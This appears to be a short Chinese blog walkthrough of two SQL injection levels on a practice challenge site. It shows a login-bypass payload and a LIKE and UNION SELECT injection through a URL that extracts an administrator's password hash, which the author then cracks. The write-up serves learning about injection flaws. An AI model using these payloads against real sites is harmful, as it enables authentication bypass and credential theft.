版权声明:本文为博主原创文章,未经博主允许不得转载。 https://blog.csdn.net/qq_28719743/article/details/82219039
SQLi Level 1
这个貌似是最基础的,就不做什么说明了
用户名随便填
密码:’ or ‘1’ = ‘1
SQLi Level 2
要以管理员的身份登录
看一下会员名单
谁是管理员呢?
直接看名字分辨不出来,那我们在链接上加个单引号能不能注入
看来可以,我们开始构造链接
%' and admin like '0
出现一大串,看来普通会员的admin的值为0
现在改为1试试
%' and admin like '1
出现了,管理员账号为 bellamond
试了一下第一道题的密码,发现失败了,看来提交后验证登陆的地方注入被修复了,那我们继续试试url
%' and admin like '1' union all select password,username from members where username like 'bellamond注意,union那边是 password,username而不是username,password,这个网站的程序会取出得到结果的第一个元素显示
很明显 1b774bc166f3f8918e900fcef8752817bae76a37 不太可能是密码,我们试着解密一下
好了,用户名是:bellamond 密码是:sup3r